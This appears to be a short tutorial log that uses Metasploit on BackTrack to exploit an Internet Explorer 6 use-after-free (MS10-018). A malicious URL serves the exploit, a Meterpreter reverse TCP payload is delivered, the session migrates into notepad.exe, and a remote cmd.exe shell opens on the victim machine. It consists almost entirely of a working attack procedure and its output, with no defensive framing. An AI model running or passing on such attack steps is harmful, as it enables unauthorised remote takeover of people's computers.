backtrack 5r1
tested with i.e version: 6.0 SP3
root@bt:~# msfconsole
msf > use windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors) > set lhost Local-IP-Address
msf exploit(ms10_018_ie_behaviors) > set URIPATH /test
msf exploit(ms10_018_ie_behaviors) > set SRVHOST Local-IP-Address
msf exploit(ms10_018_ie_behaviors) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_018_ie_behaviors) > exploit
Remote client browser connects to http://local-ip-address:8080/test this starts the exploit
[*] Exploit running as background job.
[*] Started reverse handler on local-ip-address:4444
msf exploit(ms10_018_ie_behaviors) > [*] Using URL: http://local-ip-address:8080/test
[*] Server started.
[*] remote-ip-address ms10_018_ie_behaviors - Sending Internet Explorer DHTML Behaviors Use After Free (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to remote-ip-address
[*] Meterpreter session 1 opened (local-ip-address:4444 -> remote-ip-address:1063) at 1974-08-10 12:35:58 +0100
[*] Session ID 1 (local-ip-address:4444 -> remote-ip-address:1063) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (4080)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3612
[+] Successfully migrated to process
Press enter a few times at this point
msf exploit(ms10_018_ie_behaviors) > show sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 test-pc\11 @ test-pc local-ip-address:4444 -> remote-ip-address:1063 (remote-ip-address)
msf exploit(ms10_018_ie_behaviors) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > execute -f cmd.exe -c
Process 1264 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...
Microsoft Windows XP [Version 4]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\11\Desktop>
myexploit 